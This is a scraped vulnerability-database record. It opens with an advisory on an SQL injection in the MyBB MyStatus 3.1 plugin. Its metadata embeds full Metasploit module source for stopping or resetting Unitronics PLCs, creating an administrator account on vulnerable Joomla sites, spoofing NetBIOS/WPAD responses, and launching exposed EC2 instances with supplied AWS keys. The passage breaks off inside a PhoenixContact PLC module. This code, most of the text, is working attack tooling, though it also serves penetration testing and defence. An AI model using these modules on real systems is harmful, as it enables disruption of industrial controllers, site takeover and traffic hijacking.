ID 1337DAY-ID-16996
Type zdt
Reporter Mario_Vs
Modified 2011-10-11T00:00:00
Description
Exploit for the PHP platform, in the web-applications category (SQL injection in the MyBB MyStatus 3.1 plugin).
---------------------------------------------------------------------
Exploit Title : MyBB MyStatus 3.1 SQL Injection Vulnerability
---------------------------------------------------------------------
Author : Mario_Vs
Date : 2011-10-10 (advisory written; published on 0day.today 2011-10-11)
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/mystatus
Tested On : Windows 7 (the researcher's test host only; the advisory names no MyBB core version, plugin build or database backend)
---------------------------------------------------------------------
SQL Injection via the `statid` parameter of the `delete` action:
http://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]

Notes: [SQLi] marks the injection point; no payload, proof of concept, fixed version or CVE is given, and the advisory does not say whether the delete action requires a logged-in session or MyBB's post-key/CSRF check. Confirm by reading how process-mystatus.php builds its query from statid before treating this as exploitable; the expected fix is to cast statid to an integer (or bind it as a query parameter) before it reaches the database. Defenders can review web logs for requests to process-mystatus.php whose statid value is not a plain integer.
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
{"hash": "dad75044b3cc791f7a8032ce4609092409f7a12ee4cfbc34b531622d0c443756", "id": "1337DAY-ID-16996", "lastseen": "2018-01-08T23:02:20", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "79fda2751df384ee33bc0f81cfdb121d", "key": "href"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "modified"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "794f037ba8f99725492b9271501217b6", "key": "reporter"}, {"hash": "0d42b24d026ff7bf93bd0fbb70c81bc1", "key": "sourceData"}, {"hash": "aeb41974b1969395000674f99524b0b5", "key": "sourceHref"}, {"hash": "95ab27474d65e9a3e99463b0cffd8a42", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2018-01-08T23:02:20"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-16996"]}, {"type": "zdt", "idList": ["1337DAY-ID-29285", "1337DAY-ID-16168", "1337DAY-ID-6445"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16996", "SECURITYVULNS:VULN:7705", "SECURITYVULNS:DOC:9830"]}], "modified": "2018-01-08T23:02:20"}, "vulnersScore": 6.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16996", "description": "Exploit for php platform in category web applications", "title": "MyBB MyStatus 3.1 SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "5e7aeba75eed1c2d339ba8b989a4ac5cf20ecc7f2bfa3a018b43fe8434a3d456", "id": "1337DAY-ID-16996", "lastseen": "2016-04-20T01:30:49", "enchantments": {"score": {"value": 6.1, "modified": "2016-04-20T01:30:49"}}, "hashmap": [{"hash": 
"1dc677035809cbeaa0102b0f66772969", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "95ab27474d65e9a3e99463b0cffd8a42", "key": "title"}, {"hash": "794f037ba8f99725492b9271501217b6", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1dc677035809cbeaa0102b0f66772969", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5a08c389d19b9013e34484540cb6cc63", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "ac78b44d5059ad1a67bac1544e68bfe0", "key": "sourceData"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b56332c265dd77752c561539861c7bfd", "key": "sourceHref"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/16996", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "MyBB MyStatus 3.1 SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "\ufeff---------------------------------------------------------------------\r\nExploit Title : MyBB MyStatus 3.1\r\n---------------------------------------------------------------------\r\n \r\nAuthor : Mario_Vs\r\nDate : 10/10/2011\r\nSite : http://mariovs.pl/\r\n@ : mario_vs[at]o2.pl\r\n---------------------------------------------------------------------\r\n \r\nDescription >\r\n \r\nVendor : http://mods.mybb.com/download/mystatus\r\nTested On : Windows 7\r\n---------------------------------------------------------------------\r\n \r\nSQL Injection\r\n \r\nhttp://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]\r\n---------------------------------------------------------------------\r\n \r\n---------------------------------------------------------------------\r\n 
\r\nGreets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2\r\n \r\nAll users: HackinQ.pl\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2011-10-11T00:00:00", "references": [], "reporter": "Mario_Vs", "modified": "2011-10-11T00:00:00", "href": "http://0day.today/exploit/description/16996"}, "lastseen": "2016-04-20T01:30:49", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "\ufeff---------------------------------------------------------------------\r\nExploit Title : MyBB MyStatus 3.1\r\n---------------------------------------------------------------------\r\n \r\nAuthor : Mario_Vs\r\nDate : 10/10/2011\r\nSite : http://mariovs.pl/\r\n@ : mario_vs[at]o2.pl\r\n---------------------------------------------------------------------\r\n \r\nDescription >\r\n \r\nVendor : http://mods.mybb.com/download/mystatus\r\nTested On : Windows 7\r\n---------------------------------------------------------------------\r\n \r\nSQL Injection\r\n \r\nhttp://localhost/mybb/process-mystatus.php?action=delete&statid=[SQLi]\r\n---------------------------------------------------------------------\r\n \r\n---------------------------------------------------------------------\r\n \r\nGreets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2\r\n \r\nAll users: HackinQ.pl\r\n\r\n\n\n# 0day.today [2018-01-08] #", "published": "2011-10-11T00:00:00", "references": [], "reporter": "Mario_Vs", "modified": "2011-10-11T00:00:00", "href": "https://0day.today/exploit/description/16996"}
{"metasploit": [{"lastseen": "2019-11-30T12:07:52", "bulletinFamily": "exploit", "description": "Unitronics Vision PLCs allow remote administrative functions to control the PLC using authenticated PCOM commands. This module supports START, STOP and RESET operations.\n", "modified": "2019-02-11T19:46:00", "published": "2019-02-11T19:46:00", "id": "MSF:AUXILIARY/ADMIN/SCADA/PCOM_COMMAND", "href": "", "type": "metasploit", "title": "Unitronics PCOM remote START/STOP/RESET command", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Rex::Socket::Tcp\n include Rex::Text\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Unitronics PCOM remote START/STOP/RESET command',\n 'Description' => %q{\n Unitronics Vision PLCs allow remote administrative functions to control\n the PLC using authenticated PCOM commands.\n\n This module supports START, STOP and RESET operations.\n },\n 'Author' =>\n [\n 'Luis Rosa <lmrosa[at]dei.uc.pt>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://unitronicsplc.com/Download/SoftwareUtilities/Unitronics%20PCOM%20Protocol.pdf' ]\n ],\n ))\n\n register_options(\n [\n OptEnum.new('MODE', [true, 'PLC command', 'RESET', ['START', 'STOP', 'RESET']]),\n Opt::RPORT(20256),\n OptInt.new('UNITID', [ false, 'Unit ID (0 - 127)', 0]),\n ])\n end\n\n # compute and return the checksum of a PCOM ASCII message\n def pcom_ascii_checksum(msg)\n (msg.each_byte.inject(:+) % 256 ).to_s(16).upcase.rjust(2, '0')\n end\n\n # compute pcom length\n def pcom_ascii_len(pcom_ascii)\n Rex::Text.hex_to_raw(pcom_ascii.length.to_s(16).rjust(4,'0').unpack('H4H4').reverse.pack('H4H4'))\n end\n\n # return a pcom ascii formatted request\n def pcom_ascii_request(command)\n unit_id = datastore['UNITID'].to_s(16).rjust(2,'0')\n # PCOM/ASCII\n 
pcom_ascii_payload = \"\" +\n \"\\x2f\" + # '/'\n unit_id +\n command +\n pcom_ascii_checksum(unit_id + command) + # checksum\n \"\\x0d\" # '\\r'\n\n # PCOM/TCP header\n Rex::Text.rand_text_hex(2) + # transaction id\n \"\\x65\" + # ascii (101)\n \"\\x00\" + # reserved\n pcom_ascii_len(pcom_ascii_payload) + # length\n pcom_ascii_payload\n end\n\n def run\n connect\n case datastore['MODE']\n when 'START'\n print_status 'Sending START command'\n ascii_code = \"\\x43\\x43\\x52\" # CCR\n when 'STOP'\n print_status 'Sending STOP command'\n ascii_code = \"\\x43\\x43\\x53\" # CCS\n when 'RESET'\n print_status 'Sending RESET command'\n ascii_code = \"\\x43\\x43\\x45\" # CCE\n else\n print_error \"Unknown MODE\"\n return\n end\n\n sock.put(pcom_ascii_request(ascii_code)) #\n ans = sock.get_once\n if ans.to_s[10,2] == 'CC'\n print_status 'Command accepted'\n end\n disconnect\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/scada/pcom_command.rb"}, {"lastseen": "2019-11-28T18:58:35", "bulletinFamily": "exploit", "description": "This module will attempt to launch an AWS instances (hosts) in EC2.\n", "modified": "2017-07-24T13:26:21", "published": "2017-03-13T05:57:58", "id": "MSF:AUXILIARY/ADMIN/AWS/AWS_LAUNCH_INSTANCES", "href": "", "type": "metasploit", "title": "Launches Hosts in AWS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/aws/client'\n\nclass MetasploitModule < Msf::Auxiliary\n include Metasploit::Framework::Aws::Client\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"Launches Hosts in AWS\",\n 'Description' => %q{\n This module will attempt to launch an AWS instances (hosts) in EC2.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Javier Godinez <godinezj[at]gmail.com>',\n ],\n 'References' 
=> [\n [ 'URL', 'https://drive.google.com/open?id=0B2Ka7F_6TetSNFdfbkI1cnJHUTQ'],\n [ 'URL', 'https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/4721/IDY-W10-DevSecOps-on-the-Offense-Automating-Amazon-Web-Services-Account-Takeover.pdf' ]\n ]\n )\n )\n register_options(\n [\n OptString.new('AccessKeyId', [true, 'AWS access key', '']),\n OptString.new('SecretAccessKey', [true, 'AWS secret key', '']),\n OptString.new('Token', [false, 'AWS session token', '']),\n OptString.new('RHOST', [true, 'AWS region specific EC2 endpoint', 'ec2.us-west-2.amazonaws.com']),\n OptString.new('Region', [true, 'The default region', 'us-west-2' ]),\n OptString.new(\"AMI_ID\", [true, 'The Amazon Machine Image (AMI) ID', 'ami-1e299d7e']),\n OptString.new(\"KEY_NAME\", [true, 'The SSH key to be used for ec2-user', 'admin']),\n OptString.new(\"SSH_PUB_KEY\", [false, 'The public SSH key to be used for ec2-user, e.g., \"ssh-rsa ABCDE...\"', '']),\n OptString.new(\"USERDATA_FILE\", [false, 'The script that will be executed on start', 'tools/modules/aws-aggregator-userdata.sh'])\n ]\n )\n register_advanced_options(\n [\n OptString.new('RPORT', [true, 'AWS EC2 Endpoint TCP Port', 443]),\n OptBool.new('SSL', [true, 'AWS EC2 Endpoint SSL', true]),\n OptString.new('INSTANCE_TYPE', [true, 'The instance type', 'm3.medium']),\n OptString.new('ROLE_NAME', [false, 'The instance profile/role name', '']),\n OptString.new('VPC_ID', [false, 'The EC2 VPC ID', '']),\n OptString.new('SUBNET_ID', [false, 'The public subnet to use', '']),\n OptString.new('SEC_GROUP_ID', [false, 'The EC2 security group to use', '']),\n OptString.new('SEC_GROUP_CIDR', [true, 'EC2 security group network access CIDR', '0.0.0.0/0']),\n OptString.new('SEC_GROUP_PORT', [true, 'EC2 security group network access PORT', 'tcp:22']),\n OptString.new('SEC_GROUP_NAME', [false, 'Optional EC2 security group name', '']),\n OptInt.new('MaxCount', [true, 'Maximum number of instances to launch', 1]),\n OptInt.new('MinCount', 
[true, 'Minumum number of instances to launch', 1])\n ]\n )\n deregister_options('VHOST')\n end\n\n def run\n if datastore['AccessKeyId'].blank? || datastore['SecretAccessKey'].blank?\n print_error(\"Both AccessKeyId and SecretAccessKey are required\")\n return\n end\n # setup creds for making IAM API calls\n creds = {\n 'AccessKeyId' => datastore['AccessKeyId'],\n 'SecretAccessKey' => datastore['SecretAccessKey']\n }\n creds['Token'] = datastore['Token'] unless datastore['Token'].blank?\n\n create_keypair(creds) unless datastore['SSH_PUB_KEY'].blank?\n vpc = datastore['VPC_ID'].blank? ? vpc(creds) : datastore['VPC_ID']\n sg = datastore['SEC_GROUP_ID'].blank? ? create_sg(creds, vpc) : datastore['SEC_GROUP_ID']\n subnet = datastore['SUBNET_ID'].blank? ? pub_subnet(creds, vpc) : datastore['SUBNET_ID']\n unless subnet\n print_error(\"Could not find a public subnet, please provide one\")\n return\n end\n instance_id = launch_instance(creds, subnet, sg)\n action = 'DescribeInstances'\n doc = call_ec2(creds, 'Action' => action, 'InstanceId.1' => instance_id)\n doc = print_results(doc, action)\n begin\n # need a better parser so we can avoid shit like this\n ip = doc['reservationSet']['item']['instancesSet']['item']['networkInterfaceSet']['item']['privateIpAddressesSet']['item']['association']['publicIp']\n print_status(\"Instance #{instance_id} has IP adrress #{ip}\")\n rescue NoMethodError\n print_error(\"Could not retrieve instance IP address\")\n end\n end\n\n def opts(action, subnet, sg)\n opts = {\n 'Action' => action,\n 'ImageId' => datastore['AMI_ID'],\n 'KeyName' => datastore['KEY_NAME'],\n 'InstanceType' => datastore['INSTANCE_TYPE'],\n 'NetworkInterface.1.SubnetId' => subnet,\n 'NetworkInterface.1.SecurityGroupId.1' => sg,\n 'MinCount' => datastore['MinCount'].to_s,\n 'MaxCount' => datastore['MaxCount'].to_s,\n 'NetworkInterface.1.AssociatePublicIpAddress' => 'true',\n 'NetworkInterface.1.DeviceIndex' => '0'\n }\n opts['IamInstanceProfile.Name'] = 
datastore['ROLE_NAME'] unless datastore['ROLE_NAME'].blank?\n unless datastore['USERDATA_FILE'].blank?\n if File.exist?(datastore['USERDATA_FILE'])\n opts['UserData'] = URI.encode(Base64.encode64(open(datastore['USERDATA_FILE'], 'r').read).strip)\n else\n print_error(\"Could not open userdata file: #{datastore['USERDATA_FILE']}\")\n end\n end\n opts\n end\n\n def launch_instance(creds, subnet, sg)\n action = 'RunInstances'\n print_status(\"Launching instance(s) in #{datastore['Region']}, AMI: #{datastore['AMI_ID']}, key pair name: #{datastore['KEY_NAME']}, security group: #{sg}, subnet ID: #{subnet}\")\n doc = call_ec2(creds, opts(action, subnet, sg))\n doc = print_results(doc, action)\n return if doc.nil?\n # TODO: account for multiple instances\n if doc['instancesSet']['item'].instance_of?(Array)\n instance_id = doc['instancesSet']['item'].first['instanceId']\n else\n instance_id = doc['instancesSet']['item']['instanceId']\n end\n print_status(\"Launched instance #{instance_id} in #{datastore['Region']} account #{doc['ownerId']}\")\n action = 'DescribeInstanceStatus'\n loop do\n sleep(15)\n doc = call_ec2(creds, 'Action' => action, 'InstanceId' => instance_id)\n doc = print_results(doc, action)\n if doc ['instanceStatusSet'].nil?\n print_error(\"Error, could not get instance status, instance possibly terminated\")\n break\n end\n status = doc['instanceStatusSet']['item']['systemStatus']['status']\n print_status(\"instance #{instance_id} status: #{status}\")\n break if status == 'ok' || status != 'initializing'\n end\n instance_id\n end\n\n def create_keypair(creds)\n action = 'ImportKeyPair'\n doc = call_ec2(creds, 'Action' => action, 'KeyName' => datastore['KEY_NAME'], 'PublicKeyMaterial' => Rex::Text.encode_base64(datastore['SSH_PUB_KEY']))\n if doc['Response'].nil?\n doc = print_results(doc, action)\n if doc['keyName'].nil? 
|| doc['keyFingerprint'].nil?\n print_error(\"Error creating key using privided key material (SSH_PUB_KEY)\")\n else\n print_status(\"Created #{doc['keyName']} (#{doc['keyFingerprint']})\")\n end\n else\n if doc['Response']['Errors'] && doc['Response']['Errors']['Error']\n print_error(doc['Response']['Errors']['Error']['Message'])\n else\n print_error(\"Error creating key using privided key material (SSH_PUB_KEY)\")\n end\n end\n end\n\n def pub_subnet(creds, vpc_id)\n # First look for subnets that are configured to provision a public IP when instances are launched\n action = 'DescribeSubnets'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n vpc_subnets = doc['subnetSet']['item'].select { |x| x['vpcId'] == vpc_id }\n pub_subnets = vpc_subnets.select { |x| x['mapPublicIpOnLaunch'] == 'true' }\n return pub_subnets.first['subnetId'] if pub_subnets.count > 0\n\n # Second, try to retrieve public subnet id by looking through route tables to find subnets\n # associated with an Internet gateway\n action = 'DescribeRouteTables'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n vpc_route_table = doc['routeTableSet']['item'].select { |x| x['vpcId'] == vpc_id }\n vpc_route_table.each do |route_table|\n next if route_table['associationSet'].nil? 
|| route_table['routeSet'].nil?\n entries = route_table['routeSet']['item']\n if entries.instance_of?(Hash)\n if entries['gatewayId'].start_with?('igw-')\n return route_table['associationSet']['item'].first['subnetId']\n end\n else\n route_table['routeSet']['item'].each do |route|\n if route['gatewayId'] && route['gatewayId'].start_with?('igw-')\n return route_table['associationSet']['item'].first['subnetId']\n end\n end\n end\n end\n nil\n end\n\n def create_sg(creds, vpc_id)\n name = Rex::Text.rand_text_alphanumeric(8)\n action = 'CreateSecurityGroup'\n doc = call_ec2(creds, 'Action' => action, 'GroupName' => name, 'VpcId' => vpc_id, 'GroupDescription' => name)\n doc = print_results(doc, action)\n print_error(\"Could not create SG\") && return if doc['groupId'].nil?\n sg = doc['groupId']\n proto, port = datastore['SEC_GROUP_PORT'].split(':')\n cidr = URI.encode(datastore['SEC_GROUP_CIDR'])\n action = 'AuthorizeSecurityGroupIngress'\n doc = call_ec2(creds, 'Action' => action,\n 'IpPermissions.1.IpRanges.1.CidrIp' => cidr,\n 'IpPermissions.1.IpProtocol' => proto,\n 'IpPermissions.1.FromPort' => port,\n 'IpPermissions.1.ToPort' => port,\n 'GroupId' => sg)\n doc = print_results(doc, action)\n if doc['return'] && doc['return'] == 'true'\n print_status(\"Created security group: #{sg}\")\n else\n print_error(\"Failed creating security group\")\n end\n sg\n end\n\n def vpc(creds)\n action = 'DescribeVpcs'\n doc = call_ec2(creds, 'Action' => action)\n doc = print_results(doc, action)\n if doc['vpcSet'].nil? 
|| doc['vpcSet']['item'].nil?\n print_error(\"Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}\")\n return nil\n end\n item = doc['vpcSet']['item']\n return item['vpcId'] if item.instance_of?(Hash)\n return item.first['vpcId'] if item.instance_of?(Array) && !item.first['vpcId'].nil?\n print_error(\"Could not determine VPC ID for #{datastore['AccessKeyId']} in #{datastore['RHOST']}\")\n nil\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/aws/aws_launch_instances.rb"}, {"lastseen": "2019-11-10T15:24:55", "bulletinFamily": "exploit", "description": "This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).\n", "modified": "2019-07-13T01:29:43", "published": "2016-10-27T01:46:40", "id": "MSF:AUXILIARY/ADMIN/HTTP/JOOMLA_REGISTRATION_PRIVESC", "href": "", "type": "metasploit", "title": "Joomla Account Creation and Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla Account Creation and Privilege Escalation',\n 'Description' => %q{\n This module creates an arbitrary account with administrative privileges in Joomla versions 3.4.4\n through 3.6.3. 
If an email server is configured in Joomla, an email will be sent to activate the account (the account is disabled by default).\n },\n 'References' =>\n [\n ['CVE', '2016-8869'],\n ['CVE', '2016-8870'],\n ['URL', 'https://developer.joomla.org/security-centre/660-20161002-core-elevated-privileges.html'],\n ['URL', 'https://developer.joomla.org/security-centre/659-20161001-core-account-creation.html'],\n ['URL', 'https://medium.com/@showthread/joomla-3-6-4-account-creation-elevated-privileges-write-up-and-exploit-965d8fb46fa2']\n ],\n 'Author' =>\n [\n 'Fabio Pires <fp[at]integrity.pt>', # module creation and privilege escalation\n 'Filipe Reis <fr[at]integrity.pt>', # module creation and privilege escalation\n 'Vitor Oliveira <vo[at]integrity.pt>', # module creation and privilege escalation\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => 'Oct 25 2016'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/']),\n OptString.new('USERNAME', [true, 'Username that will be created', 'expl0it3r']),\n OptString.new('PASSWORD', [true, 'Password for the username', 'expl0it3r']),\n OptString.new('EMAIL', [true, 'Email to receive the activation code for the account', 'example@youremail.com'])\n ]\n )\n end\n\n def check\n res = send_request_cgi('uri' => target_uri.path)\n\n unless res\n vprint_error('Unable to connect to target')\n return Exploit::CheckCode::Unknown\n end\n\n unless joomla_and_online?\n vprint_error('Unable to detect Joomla')\n return Exploit::CheckCode::Safe\n end\n\n version = Gem::Version.new(joomla_version)\n\n unless version\n vprint_error('Unable to detect Joomla version')\n return Exploit::CheckCode::Detected\n end\n\n vprint_status(\"Detected Joomla version #{version}\")\n\n if version.between?(Gem::Version.new('3.4.4'), Gem::Version.new('3.6.3'))\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n def get_csrf(hidden_fields)\n hidden_list = hidden_fields\n 
hidden_list.each do |fields|\n fields.each do |item|\n if item[0].length == 32 && item[1] == '1'\n return item[0]\n end\n end\n end\n end\n\n def run\n if check == Exploit::CheckCode::Safe\n print_error('Target seems safe, so we will not continue!')\n return\n end\n\n print_status(\"Trying to create the user!\")\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php/component/users/'),\n 'vars_get' => {\n 'view' => 'login'\n }\n )\n\n if res && res.code == 200\n cookie = res.get_cookies\n csrf = get_csrf(res.get_hidden_inputs)\n\n if csrf.length != 32 && cookie.split(/=/).length != 2\n print_error('Could not find csrf or cookie!')\n return\n end\n else\n print_error('Could not find Login Page!')\n return\n end\n\n mime = Rex::MIME::Message.new\n mime.add_part(datastore['USERNAME'], nil, nil, 'form-data; name=\"user[name]\"')\n mime.add_part(datastore['USERNAME'], nil, nil, 'form-data; name=\"user[username]\"')\n mime.add_part('7', nil, nil, 'form-data; name=\"user[groups][]\"')\n mime.add_part(datastore['PASSWORD'], nil, nil, 'form-data; name=\"user[password1]\"')\n mime.add_part(datastore['PASSWORD'] , nil, nil, 'form-data; name=\"user[password2]\"')\n mime.add_part(datastore['EMAIL'], nil, nil, 'form-data; name=\"user[email1]\"')\n mime.add_part(datastore['EMAIL'], nil, nil, 'form-data; name=\"user[email2]\"')\n mime.add_part('com_users', nil, nil, 'form-data; name=\"option\"')\n mime.add_part('user.register', nil, nil, 'form-data; name=\"task\"')\n mime.add_part('1', nil, nil, 'form-data; name=\"' + csrf +'\"')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php/component/users/'),\n 'cookie' => cookie,\n 'ctype' => \"multipart/form-data; boundary=#{mime.bound}\",\n 'data' => mime.to_s\n )\n\n if res && res.code == 200\n print_good(\"PWND - Your user has been created\")\n print_status(\"\\tUsername: \" + datastore['USERNAME'])\n print_status(\"\\tPassword: \" + datastore['PASSWORD'])\n 
print_status(\"\\tEmail: \" + datastore['EMAIL'])\n elsif res.redirect?\n res = send_request_cgi!(\n 'uri' => res.redirection.path,\n 'method' => 'GET',\n 'cookie' => cookie\n )\n\n print_error(\"There was an issue, but the user could have been created.\")\n\n parsed_data = res.get_html_document\n parsed_data.xpath('//div[@class=\"alert-message\"]').each do |alert_msg|\n print_error(\"\\t\" + alert_msg.text)\n end\n else\n print_error(\"This host may not be vulnerable.\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/http/joomla_registration_privesc.rb"}, {"lastseen": "2019-12-08T11:54:25", "bulletinFamily": "exploit", "description": "This module continuously spams NetBIOS responses to a target for given hostname, causing the target to cache a malicious address for this name. On high-speed local networks, the PPSRATE value should be increased to speed up this attack. As an example, a value of around 30,000 is almost 100% successful when spoofing a response for a 'WPAD' lookup. Distant targets may require more time and lower rates for a successful attack.\n", "modified": "2017-07-24T13:26:21", "published": "2016-06-19T18:36:39", "id": "MSF:AUXILIARY/ADMIN/NETBIOS/NETBIOS_SPOOF", "href": "", "type": "metasploit", "title": "NetBIOS Response Brute Force Spoof (Direct)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Udp\n\n def initialize\n super(\n 'Name' => 'NetBIOS Response Brute Force Spoof (Direct)',\n 'Description' => %q{\n This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. 
On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.\n },\n 'Author' => [\n 'vvalien', # Metasploit Module (post)\n 'hdm', # Metasploit Module\n 'tombkeeper' # Related Work\n ],\n 'License' => MSF_LICENSE,\n )\n\n register_options(\n [\n Opt::RPORT(137),\n OptString.new('NBNAME', [ true, \"The NetBIOS name to spoof a reply for\", 'WPAD' ]),\n OptAddress.new('NBADDR', [ true, \"The address that the NetBIOS name should resolve to\", Rex::Socket.source_address(\"50.50.50.50\") ]),\n OptInt.new('PPSRATE', [ true, \"The rate at which to send NetBIOS replies\", 1_000])\n ],\n self.class\n )\n end\n\n def netbios_spam\n payload =\n \"\\xff\\xff\" + # TX ID (will brute force this)\n \"\\x85\\x00\" + # Flags = response + authoratative + recursion desired\n \"\\x00\\x00\" + # Questions = 0\n \"\\x00\\x01\" + # Answer RRs = 1\n \"\\x00\\x00\" + # Authority RRs = 0\n \"\\x00\\x00\" + # Additional RRs = 0\n \"\\x20\" +\n Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack(\"A15\") + \"\\x00\" ) +\n \"\\x00\" +\n \"\\x00\\x20\" + # Type = NB\n \"\\x00\\x01\" + # Class = IN\n \"\\x00\\x04\\x93\\xe0\" + # TTL long time\n \"\\x00\\x06\" + # Datalength = 6\n \"\\x00\\x00\" + # Flags B-node, unique\n Rex::Socket.addr_aton(@fake_addr)\n\n stime = Time.now.to_f\n pcnt = 0\n pps = 0\n\n print_status(\"Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...\")\n\n live = true\n while live\n 0.upto(65535) do |txid|\n begin\n payload[0,2] = [txid].pack(\"n\")\n @sock.put(payload)\n pcnt += 1\n\n pps = (pcnt / (Time.now.to_f - stime)).to_i\n if pps > @targ_rate\n sleep(0.01)\n end\n rescue Errno::ECONNREFUSED\n print_error(\"Error: Target sent us an ICMP port unreachable, port is likely 
closed\")\n live = false\n break\n end\n end\n end\n\n print_status(\"Cleaning up...\")\n end\n\n def run\n connect_udp\n @sock = self.udp_sock\n\n @targ_addr = rhost\n @targ_port = rport\n @targ_rate = datastore['PPSRATE']\n @fake_name = datastore['NBNAME']\n @fake_addr = datastore['NBADDR']\n\n netbios_spam\n\n disconnect_udp\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/netbios/netbios_spoof.rb"}, {"lastseen": "2019-11-14T10:42:09", "bulletinFamily": "exploit", "description": "PhoenixContact Programmable Logic Controllers are built upon a variant of ProConOS. Communicating using a proprietary protocol over ports TCP/1962 and TCP/41100 or TCP/20547. It allows a remote user to read out the PLC Type, Firmware and Build number on port TCP/1962. And also to read out the CPU State (Running or Stopped) AND start or stop the CPU on port TCP/41100 (confirmed ILC 15x and 17x series) or on port TCP/20547 (confirmed ILC 39x series)\n", "modified": "2017-07-24T13:26:21", "published": "2016-05-17T13:45:45", "id": "MSF:AUXILIARY/ADMIN/SCADA/PHOENIX_COMMAND", "href": "", "type": "metasploit", "title": "PhoenixContact PLC Remote START/STOP Command", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include 